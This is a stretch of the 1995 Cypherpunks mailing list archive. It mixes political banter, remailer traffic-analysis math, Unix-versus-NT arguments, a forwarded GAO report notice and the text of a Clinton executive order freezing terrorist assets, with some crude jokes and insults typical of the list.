Content-Type: text/plain



> From:          rkmoore@iol.ie (Richard K. Moore)
> Subject:       Magna Carta Analyzed 

Nice analysis - I'll use it with thanx.

> [  Simple, succinct...and packed full of lies.
> [
> [  My only question is: why did the document have to
> [  be so long?
> [
> [ -rkm
> [

As every priest, mountebank, con artist, lawyer and politician knows, 
lites go down easier with *lots* of arm waving.  Otherwise, we might 
pay attention to the men behind the curtain.

Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Wed, 25 Jan 95 16:10:31 PST
To: tcmay@netcom.com (Timothy C. May)
Subject: Re: Doublespeak, Doublethink, Thought Police, and 1984
In-Reply-To: <199501240622.WAA26904@netcom18.netcom.com>
Message-ID: <9501260008.AA26609@doom>
MIME-Version: 1.0
Content-Type: text/plain



> I first read "1984" in around 1966, when I was in the 8th grade, and
> it has stuck with me ever since. No other novel has added as many
> basic linguistic and political ideas to the language as this novel--by
> yet another member of the Eric Conspiracy Secret Laboratories!
> 
> Big Brother, Thought Police, thoughtcrime, doublespeak, doublethink,
> Big Brother is Watching You!, War is Peace, Freedom is Slavery,
> sexcrime, unperson, and probably several other terms I've left
> out. All are part of our language.
> 
> Too bad people on both the left and the right are missing the lesson.
> 
> Any Cypherpunk who hasn't read this novel should run out tonight to
> the All-Nite Barnes and Borders Megastore and buy a copy.

And while you're at it, you might want to take a look at Orwell's
classic essay, "Politics and the English Language."


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 25 Jan 95 13:22:50 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: In Re: Modem Tax
In-Reply-To: <9501252008.AA15469@snark.imsi.com>
Message-ID: <Pine.SOL.3.90.950125161731.13836A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm just up the road.  Can I be of service?


On Wed, 25 Jan 1995, Perry E. Metzger wrote:

> 
> Rhys Kyraden says:
> >         I wanted to oh so thankfully thank all 15 of you who so calmly and
> > straightforwardly set me straight on this subject. I must apologize for my
> > dire misdeed in presenting this to the list. Maybe you could all form a
> > lynch mob, come on down to good ole Tennessee and beat this poor ignorant
> > Hillbilly to death, hang him from a tree, and burn a few crosses while your
> > at it.
> 
> Aw, shucks. Its nice of you to invite us, but I'm a bit busy this
> week. Could I send some friends?
> 
> Perry
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Wed, 25 Jan 95 08:19:46 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
Message-ID: <Pine.3.89.9501251635.A18687-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Jan 1995, Charles Bell wrote:

> how do
> we ensure that those skyscrapers don't fall down on us?  That the surgeon
> who is going to open me up knows something about surgery?  That my money
> is at least somewhat safe in the bank?

With non-government reptutation and certification agencies. Currently the
government is saying 'there shall be one certification agency and it shall
be us', whereas personally if I were hiring someone to design a skyscraper
or cut me open I'd much prefer to pick someone who had a good rating from
three or four independent agencies. 

The only difference is that you would have the choice of choosing someone
cheap who didn't have a good reputation, not that we'd give up on them
altogether (see the numerous past discussions of reputations etc on the 
list, and the Cyphernomicon).

> ....once we get past what seems to be your utter refusal to consider
> the possibility that government could ever do anything right ....

Another thing to consider is that the government monopoly has a lot less
to lose by certifying people incorrectly than a commercial agency would.
The government's reputation is low enough already that such errors won't
affect it significantly, whereas a commercial agency would lose a lot of
custom to its competitors. 

		Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Richard F. Dutcher" <rfdutcher@igc.apc.org>
Date: Wed, 25 Jan 95 19:14:21 PST
To: cypherpunks@toad.com
Subject: (Fwd) Information Superhighway - GAO Report
Message-ID: <199501260315.TAA07854@mail.igc.apc.org>
MIME-Version: 1.0
Content-Type: text/plain



Old news, I'm sure, but certain to be cited in the legal & regulatory 
debates ...

------- Forwarded Message Follows -------
Date:          Wed, 25 Jan 1995 11:49:42 EST
Reply-to:      gao-docs <gao-docs@MAILHOST.GAO.GOV>
From:          gao-docs <gao-docs@MAILHOST.GAO.GOV>
Subject:       Information Superhighway - GAO Report
To:            Multiple recipients of list PUBPOL-L <PUBPOL-L@UMINN1.BITNET>

                       GAO Report - Information Superhighway

The U.S. General Accounting Office, the Congressional watchdog
agency, has recently released the following report:

  *** ASCII Full Text Access and Ordering Info Follows ***

TITLE:    Information Superhighway: An Overview of Technology Challenges
          RPTNO: AIMD-95-23                  DOCUMENT DATE: 01/23/95

BACKGROUND:
    GAO reviewed the technical issues associated with protecting the
    information superhighway from unauthorized access.
FINDINGS:
    GAO found that: (1) the information superhighway poses technical challenges
    concerning the security, privacy, and reliability of personal and
    proprietary information; (2) a large proportion of the information that
    will traverse the superhighway will be sensitive and a tempting target for
    hackers, foreign governments conducting political and military intelligence
    operations, domestic and foreign enterprises engaged in industrial
    espionage, or terrorist groups seeking to disrupt society or the economy;
    (3) significant effort will be needed to define, develop, test, and
    implement measures to prevent unauthorized access to the superhighway; (4)
    although the federal government could play a leading role in ensuring the
    superhighway's security, critics argue that individuals should be free to
    choose the technical means for meeting their security requirements; (5) a
    major challenge facing the development of the information superhighway will
    be creating a consensus between the federal government, computer and
    communications industry, business community, and civil liberties groups on
    how to ensure information security and privacy; (6) federal and private
    sectors have begun establishing uniform standards to ensure the
    superhighway's interoperability; and (7) questions remain about how to
    protect the superhighway from large network failures and encourage the
    telecommunications industry to develop a secure and reliable
    infrastructure.

***************************************************************

This report is available both in print and electronically.

***************************************************************
[junk deleted]
***************** ELECTRONIC ORDER INFORMATION ****************

To access GAO reports as FULL TEXT ASCII electronic files from
the Government Printing Office (GPO) BBS, follow these steps:

1) TELNET to <federal.bbs.gpo.gov> and designate "port 3001"
   or dial 202-512-1387 (Menu Selection #22 on FEDWORLD);

(***NOTE*** Depending on how your system accesses the TELNET
feature, you may need to TELNET to this address:

                   <federal.bbs.gpo.gov 3001>
                                        ^^^^^
and hit return a few times after connecting.  You should receive
a greeting screen.  If you receive a prompt for "PASSWORD",
something is wrong.  Either re-try or contact GPO at the phone
number below.)

2) Log in or register on system (type: "NEW" if first time user);

3) From the Main Menu, select "File Library System - 6";

4) Select "S - Select Library";

5) Type:  "GAO_RPTS";

6) Select file name: Information Superhighway: AI95023.TXT

*****************************************************************

Any questions on using the GPO system should be referred to GPO
at 202-512-1530.  Please do NOT use this e-mail address for
questions about the GPO system or for ordering reports.

GPO charges a fee to download each file.  Exact costs are listed
on the GPO system.

NOTE: All Federal Depository Libraries are authorized to download
files at no charge.  FDL's must first be registered on the GPO
system in order to be authorized free download access.

****************************************************************

                 PRINTED COPY ORDER INFORMATION

Printed copies via U.S. Mail are also available by calling
202-512-6000 (TDD number is 301-413-0006), sending a FAX to
301-258-4066, or by writing to:

        P.O. Box 6015, Gaithersburg, MD 20884-6015.

Please include the report number and complete postal mailing
information in your request.

Telephone requests can be made 24 hours a day, seven days a week.
During non-business hours, leave a voice mail message with
complete information, including the report number and postal
mailing information.

Copies may also be picked up at the GAO headquarters at:

        700 - 4th St., NW, Washington, DC.

Sorry, we are NOT able to accept electronic orders for printed
documents at this time.

The first printed copy is FREE of charge.  Additional copies are
$2.00.

****************************************************************
[more junk deleted]

Please forward comments and suggestions to:

                       <gao-docs@gao.gov>

Thank you.

***************************************************************
Rich Dutcher, San Francisco Greens
P.O. Box 77005, San Francisco, California 94107 USA

"That's libertarians for you - anarchists who want police protection from their slaves."
                          Kim Stanley Robinson, "Green Mars"

Greens, of course, only enslave plants - so weed-whackers work better than cops ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 25 Jan 95 13:34:51 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Identity
In-Reply-To: <199501252027.AA15453@bolero.rahul.net>
Message-ID: <199501252136.QAA04802@ducie.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


someone wrote anonymously:
> Fuck Gannett.

This belongs in private email, assuming that isolated epithets are worth
sharing with anyone outside your primal scream therapy group. 

Are you related to Detweiler, perchance ?

 -L. Futplex McCarthy



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Wed, 25 Jan 95 16:58:19 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: Remailer
Message-ID: <199501260057.AA15184@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> From: Louis Cypher (alt.anonymous.messages)
> 
> Define "f" as the fraction of remailer using population sending a 
> message in a given tick. This is also the probability that any 
> individual will send a message in a given tick. The probability of a 
> given pair of corespondents in a given tick is
> 	f^2
> The probability of a pair of corespondents occurring m times in n 
> ticks is
>         m
> p= 1 - Sum [(f^2)^i (1 - f^2)^(n-i) n! / (i! (n-i)!)]
>        i=0

Hmm... this sounds very similar to the results of my 
analysis which I posted yesterday (Subject: analysis of Chaum's MIX
continued), which I think is slightly more general.

> Lets put some numbers in there.... [deleted]
> So, for a remailer using population of 10,000 you had better send less 
> than 5 messages per month to your accomplice.  This only gets worse 
> the longer you keep it up. You can not send 4 per month, month after 
> month.

Plugging these numbers into my formula, the "threshold of
tracibility" comes out to be 4 messages.  This is probably due to the 
fact that I used a normal approximation for the binomial 
probability (the p in the above formula).

The general conclusion however is the same: unless most 
users send a lot of dummy mail to each other, a Chaum type 
mix will not provide very good untracibility.

The other possible way to increase untracibility is to 
decrease the number of batches per unit time (i.e., 
increase average latency).  This implies that with a 
Chaumian mix, there is an unavoidable tradeoff between 
untracibility, bandwidth (i.e., how much dummy mail has to 
be sent), and latency.

Wei Dai


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLybywzl0sXKgdnV5AQF0+AP/e5sKTVt5plvGydmILm+cBF14q6IJttDJ
U0Es21jMH0hYPreiRwfUXwMc+bLs/RfTdmGBr0KUPHow0khlzfGHjU8ZKOMknSI/
+qvqHlMRPDfvKnp244qsQUJ1UmLAezeNObO4OMbejWbRRGu+Dd1iEeBpgnFOh0bH
6grf4VupdpU=
=+Um1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 25 Jan 95 17:03:27 PST
To: sorr@eznet.net
Subject: Re: Sex with the Gannett newspaper chain
Message-ID: <v03001113ab4ca3df3779@[140.174.229.224]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 1/25/95, nobody@rahul.net wrote:
>sorr@eznet.net wrote:
>>I'm a reporter at the daily newspapers in Rochester, N.Y., researching a
>> story on the recent spate of IP-spoof hack events....
>
>Fuck Gannett.

Thanks for the deeply intellectual addition to the discussion in progress.
Perhaps you could send Steve Orr a message from a non-anon account
explaining why you think his troll shows he's a clueless newbie, or, even
better, forward some of the research material to him, so we don't wind up
with another sensational, uninformative article.

Oh well, I guess it's each to his ability...

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Wed, 25 Jan 95 17:31:04 PST
To: cypherpunks@toad.com
Subject: US News and World Report [Repost]
Message-ID: <Pine.3.89.9501251903.C19918-0100000@jake.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----
 
I just looked over an article in US News and World Report today.  The cover
was a badge with the words "Cyber Cops" on it.  Guess which article I
scanned.
 
"Is Anything Safe in Cyberspace?"
 
I think it came over okay.  Quoted Chaum, mentioned the positive uses of
remailers, had an extensive sections on privacy and on free speech.  It
was somewhat sympathetic to Clipper, didn't really take the protests
seriously.  Mentioned anonymous ecash.  It also had a quote skewering the
highway metiphore, "It's organic".
 
This was all after the four horsemen were trotted out, in all their glory.
If anyone looked at only the first six inches, it sounded like an attack on
the net as a whole.
 
I'ld give it a 4 on an objective scale, 7 compared to what we expect.
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulous are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyRiMHmgMs8UcStNAQE0jQf+PoZWpuN5y8mDfpvn7g1eiJs6uHI+7DqM
lS63jgQs5zE4Nfk7yXCyhh9HY7qx8T2P4TvRUBGFGZk74+9ANg54GopBDLWYEwFM
eNgheMg1w/iF6kyrEyPBLS3QaphfjDgknf6ohBv6qx/ZOJ7N10iWW06eu5O/H9Se
YDk6RvUzz7niyknGG1kO3aTqTqQ3tSG21FRktV7gbUeayLCLdhQKD7bowZkClR6Z
KJ2gVvu7dmNczpsMYleZjOD2p9rSsMKoL42rJykbJRwHunJhF8hgaUnq8P7frmea
xJ8YlcrrI+rwY5mNb6ylNR/KLNvV+rd17IZjE/+3xaPEM+s04dy1Rw==
=WAub
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mo Baxter <morpheus@math.whitman.edu>
Date: Wed, 25 Jan 95 19:57:07 PST
To: cypherpunks@toad.com
Subject: Starting a remailer
Message-ID: <Pine.SOL.3.91.950125195543.7649A-100000@calvin>
MIME-Version: 1.0
Content-Type: text/plain


I need info on what's needed to operate a secure remailer out of an edu
address.  I'd appreciate anything about software, installation, maintenance,
problems, etc... 

Thanks,
	Mo

		"We're all in it together."
				--Harry Tuttle 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Marcus <datadec@cs.UCR.edu>
Date: Wed, 25 Jan 95 19:57:25 PST
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <m0rXFy8-0009t3C@sdwsys>
Message-ID: <199501260357.TAA07311@cs.UCR.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > > Windows NT is supposedly secure.  Certainly its design makes
> > > it possible to write software that is intrinsicly secure,
> > 
> > Why do you think that? Certainly it's compartmentalism
> > is better than UNIX, and as a "ground-up" design it's
> > probably seen better QA than UNIX. However, it hasn't had
> > 20 years of interest from hackers and others. Also, while
> > the NT kernel may be *better*, several subsystems have
> > all the problems of UNIX, e.g. TCP/IP and the sequence
> > number attack.
> > 
> > I like NT, but it will never be a security panacea.
> > 
> > --
> > Richard Parratt
> 
> IMHO:
> 
> When are people going to realize that Windows NT is just a partial,
> microkernel (?right), enhanced scheduler Unix?  Add the other
> half with NutCracker or Consensys's product (what's it called?),
> and you have have a Posix (not just shell) and Unix SysVR4.2
> compatible environment (Supposedly).
> 
> Unless they make too many mistakes of not staying simple with
> core concepts or not implementing enough basic building blocks,
> I can hopefully treat it as just another Unix platform.
> 
> <Obviously still irritated that companies think (or know...) that
> they can eek out more money by reinventing instead of refurbishing
> or augmenting something flexible enough to do anything they want.
> Face it: there is nothing I can't add to a Unix system, and it wouldn't
> have to affect existing programs one bit.>

Unfortunately, however, there are a lot of things that a lot of people can't
do in a unix system.  Unix is probably the most widely used unfriendly
cryptic, and complicated operating system today.  With the upcoming of
Linux, this will probably change somewhat in the future, but until I can
teach my secretary how she can use latex to type and print her letters, we
are going to be stuck with getting us whatever the bastards at MicroSoft
think we want.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joshua geller <joshua@dee.retix.com>
Date: Wed, 25 Jan 95 20:30:14 PST
To: datadec@cs.UCR.edu
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <199501260357.TAA07311@cs.UCR.EDU>
Message-ID: <199501260429.UAA14595@sleepy.retix.com>
MIME-Version: 1.0
Content-Type: text/plain



Kevin Marcus writes:

>   Unfortunately, however, there are a lot of things that a lot of people 
>   can't do in a unix system.  Unix is probably the most widely used 
>   unfriendly cryptic, and complicated operating system today.  With the 
>   upcoming of Linux, this will probably change somewhat in the future, but 
>   until I can teach my secretary how she can use latex to type and print her 
>   letters, we are going to be stuck with getting us whatever the bastards 
>   at MicroSoft think we want.

well there is (or was) NeXTStep. always thought it was a pity that
didn't take off.

josh







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Wed, 25 Jan 95 18:11:01 PST
To: Cypherpeople <cypherpunks@toad.com>
Subject: Reordering, not Latency (Was: Re: Remailer)
In-Reply-To: <199501252158.NAA12786@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950125210658.29117A-100000@unix2.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 25 Jan 1995 Louis Cypher wrote:

> In recent discussions, the consensus 
> was that message reordering was superior to (and the actual intent of) 
> latency.  Reordering is not sufficient, a form of latency is required 
> to make it effective.

	I have literally hundreds of messages archived from the CP list of
several months back where Eric Hughes repeatedly states that reordering,
not latency, is the key. Reordering of a sufficient magnitude will
introduce latency inherently. Otherwise you are still vulnerable to 
traffic analysis (which is an art, not a science, remember).

--
Michael Handler                                         <grendel@netaxs.com>
Civil Liberty Through Complex Mathematics                   Philadelphia, PA
"Toi qui fais au proscrit ce regard calme et haut" -- Baudelaire * Skotoseme
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 25 Jan 95 21:14:43 PST
To: joshua@dee.retix.com (joshua geller)
Subject: Unix, Linux, NeXTStep, etc.
In-Reply-To: <199501260429.UAA14595@sleepy.retix.com>
Message-ID: <199501260513.VAA11989@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


(Thread name changes, as "Clinton freezes assets...." didn't seem too
relevant. Is it just me, or are people no longer even bothering to
change thread names to reflect contents?)

joshua geller wrote:

> Kevin Marcus writes:
> 
> >   Unfortunately, however, there are a lot of things that a lot of people 
> >   can't do in a unix system.  Unix is probably the most widely used 
> >   unfriendly cryptic, and complicated operating system today.  With the 
> >   upcoming of Linux, this will probably change somewhat in the future, but 
> >   until I can teach my secretary how she can use latex to type and print her 
> >   letters, we are going to be stuck with getting us whatever the bastards 
> >   at MicroSoft think we want.
> 
> well there is (or was) NeXTStep. always thought it was a pity that
> didn't take off.

I was about to say the same thing! Not to push NeXTStep per se, as it
is apparently doomed for a variety of reasons,  but to say that
popular applications can be--and have been--ported to Unix. Many of
you presumably have first-hand knowledge of this, with apps like
Mathematica, FrameMaker, WordPerfect, etc. on Unix boxes as well as
PCs and Macs.

This is separate, I think, from the issue of teaching secretaries
LaTex...that sounds truly evil. (8-))

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Sattler <msattler@jungle.com>
Date: Wed, 25 Jan 95 22:06:06 PST
To: cypherpunks@toad.com
Subject: Re: FrameMaker, LaTeX, Mac, PC, UNIX, ...
Message-ID: <v0300110cab4ceb6302f4@[140.174.229.224]>
MIME-Version: 1.0
Content-Type: text/plain


At 21:13 1/25/95, Timothy C. May wrote:

>...but to say that
>popular applications can be--and have been--ported to Unix. Many of
>you presumably have first-hand knowledge of this, with apps like
>Mathematica, FrameMaker, WordPerfect, etc. on Unix boxes as well as
>PCs and Macs.

I say this only to defend by Pedantics degree, but I believe that
FrameMaker was originally a UNIX product that was horribly ported to the
Macintosh.  (I had the unfortunate experience of using the first Mac
incarnotion; I racked up some pretty good karma... :-)

>This is separate, I think, from the issue of teaching secretaries
>LaTex...that sounds truly evil. (8-))

Did that ;-)  It's amazing how much of office routine can be done with the
simple application of cut-and-paste boilerplate.

-----------------------------------------------------------------------+
Michael Sattler <msattler@jungle.com>       San Francisco, California  |
Digital Jungle Consulting Services     http://www.jungle.com/msattler/ |
                                                                       |
And so these men of Indostan/ disputed long and loud/ each in his own  |
opinion/ exceeding stiff and strong/ though each was partly right/ and |
all were in the wrong! - John Godfrey Saxe                             |






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 25 Jan 95 19:12:09 PST
To: rparratt@london.micrognosis.com (Richard Parratt)
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <9501251010.AA03760@pero>
Message-ID: <m0rXFy8-0009t3C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


...
> > Windows NT is supposedly secure.  Certainly its design makes
> > it possible to write software that is intrinsicly secure,
> 
> Why do you think that? Certainly it's compartmentalism
> is better than UNIX, and as a "ground-up" design it's
> probably seen better QA than UNIX. However, it hasn't had
> 20 years of interest from hackers and others. Also, while
> the NT kernel may be *better*, several subsystems have
> all the problems of UNIX, e.g. TCP/IP and the sequence
> number attack.
> 
> I like NT, but it will never be a security panacea.
> 
> --
> Richard Parratt

IMHO:

When are people going to realize that Windows NT is just a partial,
microkernel (?right), enhanced scheduler Unix?  Add the other
half with NutCracker or Consensys's product (what's it called?),
and you have have a Posix (not just shell) and Unix SysVR4.2
compatible environment (Supposedly).

Unless they make too many mistakes of not staying simple with
core concepts or not implementing enough basic building blocks,
I can hopefully treat it as just another Unix platform.

<Obviously still irritated that companies think (or know...) that
they can eek out more money by reinventing instead of refurbishing
or augmenting something flexible enough to do anything they want.
Face it: there is nothing I can't add to a Unix system, and it wouldn't
have to affect existing programs one bit.>

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@well.sf.ca.us>
Date: Wed, 25 Jan 95 22:30:50 PST
To: cypherpunks@toad.com
Subject: Get ready to start breaking rocks for Herr Klinton
Message-ID: <199501260630.WAA24101@well.sf.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Sorry for the long post.  I cut it down as much as I could, but I 
think maybe people ought to read this.

As I understand it, one "terrorist" message through your remailer and
you're breaking rocks while some FBI jerk is playing Doom on your
PC.

Cheers,

Brad


Heil Bill!
- - - - - - - - - - begin included text - - - - - - - - - - - -
                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release            January 24, 1995
  
  
                     EXECUTIVE ORDER
  
                      - - - - - - -
  
       PROHIBITING TRANSACTIONS WITH TERRORISTS WHO
    THREATEN TO DISRUPT THE MIDDLE EAST PEACE PROCESS
  
  
       By the authority vested in me as President by 
  the Constitution and the laws of the United States of 
  America, including the International Emergency 
  Economic Powers Act (50 U.S.C. 1701 et seq.) (IEEPA), 
  the National Emergencies Act (50 U.S.C. 1601 
  et seq.), and section 301 of title 3, United States 
  Code,
  
       I, WILLIAM J. CLINTON, President of the United 
  States of America, find that grave acts of violence 
  committed by foreign terrorists that disrupt the 
  Middle East peace process constitute an unusual and 
  extraordinary threat to the national security, 
  foreign policy, and economy of the United States, and 
  hereby declare a national emergency to deal with that 
  threat.
  
       I hereby order:
  
       Section 1.  Except to the extent provided in 
  section 203(b)(3) and (4) of IEEPA (50 U.S.C. 
  1702(b)(3) and (4)) and in regulations, orders, 
  directives, or licenses that may be issued pursuant 
  to this order, and notwithstanding any contract 
  entered into or any license or permit granted prior 
  to the effective date:  (a) all property and 
  interests in property of:
  
       (i)  the persons listed in the Annex to this 
  order;
  
       (ii) foreign persons designated by the Secretary 
       of State, in coordination with the Secretary of 
       the Treasury and the Attorney General, because 
       they are found:
  
       (A)  to have committed, or to pose a significant 
       risk of committing, acts of violence that have 
       the purpose or effect of disrupting the Middle 
       East peace process, or
  
       (B)  to assist in, sponsor, or provide 
       financial, material, or technological support 
       for, or services in support of, such acts of 
       violence; and
  
       (iii) persons determined by the Secretary of the 
       Treasury, in coordination with the Secretary of 
       State and the Attorney General, to be owned or 
       controlled by, or to act for or on behalf of, 
       any of the foregoing persons, that are in the 
       United States, that hereafter come within the 
       United States, or that hereafter come within the 
       possession or control of United States persons, 
       are blocked;
  
       (b)  any transaction or dealing by United States 
  persons or within the United States in property or 
  interests in property of the persons designated in or 
  pursuant to this order is prohibited, including the 
  making or receiving of any contribution of funds, 
  goods, or services to or for the benefit of such 
  persons;

       (c)  any transaction by any United States person 
  or within the United States that evades or avoids, or 
  has the purpose of evading or avoiding, or attempts 
  to violate, any of the prohibitions set forth in this 
  order, is prohibited.
  
       Sec. 2. For the purposes of this order:  (a) the 
  term "person" means an individual or entity;
  
       (b)  the term "entity" means a partnership, 
  association, corporation, or other organization, 
  group, or subgroup;
  
       (c)  the term "United States person" means any 
  United States citizen, permanent resident alien, 
  entity organized under the laws of the United States 
  (including foreign branches), or any person in the 
  United States; and
  
       (d)  the term "foreign person" means any citizen 
  or national of a foreign state (including any such 
  individual who is also a citizen or national of the 
  United States) or any entity not organized solely 
  under the laws of the United States or existing 
  solely in the United States, but does not include a 
  foreign state.
  
       Sec. 3.  I hereby determine that the making of 
  donations of the type specified in section 
  203(b)(2)(A) of IEEPA (50 U.S.C. 1702(b)(2)(A)) by 
  United States persons to persons designated in or 
  pursuant to this order would seriously impair my 
  ability to deal with the national emergency declared 
  in this order, and hereby prohibit such donations as 
  provided by section 1 of this order.
  
       Sec. 4.  (a) The Secretary of the Treasury, in 
  consultation with the Secretary of State and, as 
  appropriate, the Attorney General, is hereby 
  authorized to take such actions, including the 
  promulgation of rules and regulations, and to employ 
  all powers granted to me by IEEPA as may be necessary 
  to carry out the purposes of this order.  The 
  Secretary of the Treasury may redelegate any of these 
  functions to other officers and agencies of the 
  United States Government.  All agencies of the 
  United States Government are hereby directed to take 
  all appropriate measures within their authority to 
  carry out the provisions of this order.
  
       (b)  Any investigation emanating from a possible 
  violation of this order, or of any license, order, or 
  regulation issued pursuant to this order, shall first 
  be coordinated with the Federal Bureau of 
  Investigation (FBI), and any matter involving 
  evidence of a criminal violation shall be referred to 
  the FBI for further investigation.  The FBI shall 
  timely notify the Department of the Treasury of any 
  action it takes on such referrals.
  
       Sec. 5.  Nothing contained in this order shall 
  create any right or benefit, substantive or 
  procedural, enforceable by any party against the 
  United States, its agencies or instrumentalities, its 
  officers or employees, or any other person.
  
       Sec. 6.  (a) This order is effective at 12:01 
  a.m., eastern standard time on January 24, 1995.
  
       (b) This order shall be transmitted to the 
  Congress and published in the Federal Register.
  
  
       	    	      	   	WILLIAM J. CLINTON
  
  THE WHITE HOUSE,
      January 23, 1995.
  
  
                           more
                                  3
  
  
                                ANNEX
  
              TERRORIST ORGANIZATIONS WHICH THREATEN TO
                DISRUPT THE MIDDLE EAST PEACE PROCESS
  
  
  Abu Nidal Organization (ANO)
  
  Democratic Front for the Liberation of Palestine (DFLP)
  
  Hizballah
  
  Islamic Gama'at (IG)
  
  Islamic Resistance Movement (HAMAS)
  
  Jihad
  
  Kach
  
  Kahane Chai
  
  Palestinian Islamic Jihad-Shiqaqi faction (PIJ)
  
  Palestine Liberation Front-Abu Abbas faction (PLF-Abu Abbas)
  
  Popular Front for the Liberation of Palestine (PFLP)
  
  Popular Front for the Liberation of Palestine-General Command 
  (PFLP-GC)
  
  
  
  
                               #  #  #
  




                     THE WHITE HOUSE
  
              Office of the Press Secretary
  
  _____________________________________________________
  
  For Immediate Release	   	 January 23, 1995
  
  
  
                     EXECUTIVE ORDER
  
                      - - - - - - -
  
     PRESIDENT'S ADVISORY BOARD ON ARMS PROLIFERATION 
			 POLICY
  
  
       By the authority vested in me as President by 
  the Constitution and the laws of the United States of 
  America, including section 1601 of the National 
  Defense Authorization Act, Fiscal Year 1994 (Public 
  Law 103-160), and the Federal Advisory Committee Act, 
  as amended (5 U.S.C. App. 2) ("Act"), except that 
  subsections (e) and (f) of section 10 of such Act do 
  not apply, and section 301 of title 3, United States 
  Code, it is hereby ordered as follows:
  
       Section 1.  Establishment.  There is established 
  within the Department of Defense the "President's 
  Advisory Board on Arms Proliferation Policy" 
  ("Board").  The Board shall consist of five members 
  who shall be appointed by the President from among 
  persons in private life who are noted for their 
  stature and expertise regarding the proliferation of 
